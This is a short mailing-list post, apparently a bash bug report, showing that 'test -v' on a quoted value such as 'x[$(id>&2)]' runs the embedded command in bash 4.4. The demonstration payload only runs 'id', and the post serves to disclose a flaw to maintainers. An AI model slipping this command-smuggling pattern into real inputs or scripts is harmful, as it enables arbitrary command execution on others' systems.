[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Arbitrary command execution from test on a quoted string
From: |
elettrino |
Subject: |
Arbitrary command execution from test on a quoted string |
Date: |
Thu, 28 Oct 2021 20:33:22 +0000 |
The following shows an example of bash testing a quoted string and as a result
executing a command embedded in the string.
Here I used the command "id" to stand as an example of a command. The output of
id on this machine was as follows:
user@machine:~$ id
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
So to demonstrate:
user@machine:~$ USER_INPUT='x[$(id>&2)]'
user@machine:~$ test -v "$USER_INPUT"
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
This means that if variable USER_INPUT was indeed input from a user, the user
could execute an arbitrary command.
Also unexpected (and presumably related), bash is expanding the construct
inside single quote marks:
user@machine:~$ test -v 'x[$(id>&2)]'
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
user@machine:~$ echo $BASH_VERSION
4.4.20(1)-release
user@machine:~$
I don't know whether this happens with anything other than the -v option with
test; I have not seen it happen under any other circumstance.
Sent with [ProtonMail](https://protonmail.com) Secure Email.
- Arbitrary command execution from test on a quoted string,
elettrino <=
Re: Arbitrary command execution from test on a quoted string, Ilkka Virta, 2021/10/29